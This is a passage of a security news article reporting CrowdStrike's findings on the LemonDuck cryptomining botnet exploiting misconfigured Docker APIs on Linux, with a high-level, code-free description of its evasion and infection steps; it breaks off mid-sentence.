LemonDuck cryptomining botnet previously targeted Microsoft Exchange servers. Now it is targeting the world’s leading containerization platform, Docker.
According to the latest research from cybersecurity experts at CrowdStrike, the infamous LemonDuck crypto mining botnet targets the Docker platform on Linux systems to mine for cryptocurrency.
In this currently active campaign, the botnet is taking extensive new measures to avoid detection, such as leveraging proxy pools for hiding its wallet addresses and attempts to disable the Alibaba cloud monitoring service.
The Docker platform is used for running containers in the cloud. According to CrowdStrike researchers, the LemonDuck botnet exploits the misconfiguration in Docker that leads to API exposure and facilitates deploying exploit kits and malware.
In his analysis, Manoj Ahuje with CrowdStrike stated that cloud and container ecosystems heavily rely on Linux, which draws the attention of botnet operators such as LemonDuck, targeting Docker.
Details of the Attack
LemonDuck targets the Docker platform by running a malicious container on the exposed Docker APY through a customer Docker Entrypoint instruction. This is used for configuring how the container would run to download an image file. This file has been disguised as a Bash script. It then sets up a Linux cronjob